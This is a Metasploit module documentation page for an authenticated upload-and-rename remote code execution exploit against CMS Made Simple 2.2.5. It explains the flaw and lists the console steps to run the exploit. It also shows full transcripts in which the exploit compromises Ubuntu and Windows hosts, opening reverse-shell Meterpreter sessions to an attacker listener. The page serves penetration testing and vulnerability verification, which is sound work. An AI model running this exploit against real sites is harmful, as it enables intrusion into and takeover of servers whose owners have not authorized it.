adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/multi/http/cmsms_upload_rename_rce.md
T
Brendan Coles 19239c72c0 Update cmsms_upload_rename_rce check and docs
2018-07-19 18:26:42 +00:00

2.3 KiB
Raw Blame History

Description

CMS Made Simple allows an authenticated administrator to upload a file and rename it to have a .php extension. The file can then be executed by opening the URL of the file in the /uploads/ directory.

This module has been successfully tested on CMS Made Simple versions 2.2.5 and 2.2.7.

Vulnerable Application

CMS Made Simple v2.2.5

Verification Steps

  1. ./msfconsole -q
  2. use use exploit/multi/http/cmsms_upload_rename_rce
  3. set username <username>
  4. set password <password>
  5. set rhosts <rhost>
  6. run

Scenarios

CMS Made Simple v2.2.5 on Ubuntu 18.04 (PHP 7.2.7, Apache 2.4.9)

msf5 > use exploit/multi/http/cmsms_upload_rename_rce
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev
username => msfdev
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev
password => msfdev
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.123
rhosts => 172.22.222.123
msf5 exploit(multi/http/cmsms_upload_rename_rce) > run

[*] Started reverse TCP handler on 172.22.222.194:4444 
[*] Sending stage (37775 bytes) to 172.22.222.123
[*] Meterpreter session 1 opened (172.22.222.194:4444 -> 172.22.222.123:44352) at 2018-07-17 08:41:33 -0500

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-23-generic #25-Ubuntu SMP Wed May 23 18:02:16 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >

CMS Made Simple v2.2.5 on Windows 10 x64 (PHP 5.6.35, Apache 2.4.33)

msf5 > use exploit/multi/http/cmsms_upload_rename_rce
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev
username => msfdev
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev
password => msfdev
msf5 exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.175
rhosts => 172.22.222.175
msf5 exploit(multi/http/cmsms_upload_rename_rce) > run

[*] Started reverse TCP handler on 172.22.222.194:4444 
[*] Sending stage (37775 bytes) to 172.22.222.175
[*] Meterpreter session 1 opened (172.22.222.194:4444 -> 172.22.222.175:49829) at 2018-07-17 08:46:27 -0500

meterpreter > sysinfo
Computer    : WIN10
OS          : Windows NT WIN10 10.0 build 17134 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter >
Reference in New Issue View Git Blame Copy Permalink